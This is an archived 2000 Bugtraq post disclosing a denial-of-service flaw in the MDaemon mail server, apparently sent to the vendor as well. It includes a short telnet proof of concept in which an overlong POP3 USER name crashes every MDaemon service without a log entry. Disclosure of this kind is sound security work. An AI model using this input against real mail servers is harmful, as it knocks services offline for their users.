[15035] in bugtraq
Deerfield Communications MDaemon Mail Server DoS
daemon@ATHENA.MIT.EDU (cassius@HUSHMAIL.COM)
Thu May 25 04:08:16 2000
Message-Id: <200005241728.KAA13584@mail5.hushmail.com>
Date: Wed, 24 May 2000 10:26:29 -0800
Reply-To: cassius@HUSHMAIL.COM
From: cassius@HUSHMAIL.COM
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Deerfield Communications (the Wingate perpetrators) MDaemon POP server is
vulnerable to bigass usernames causing a DoS. MDaemon is a mail server
package for 95,98,NT and Win2k. Many systems that run Deerfield's World
Client web-mail also use MDaemon.
Exploit tested on Win2kpro running MDaemon 3.0.3
telnet example.com 110
+OK example.com POP service ready [1] using MDaemon v3.0.3 R
user ................(x256 more or less but 256 does the trick)
pass b00m!
This kills MDaemon and all of it's servers (POP3, IMAP, SMTP)
Nothing is logged. Event viewer says the service has terminated unexpectedly.
With proper research an overflow attack might be possible but I couldn't
find any access violations.
Vendor has been copied this message. Not much else to say.
-Cassius
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
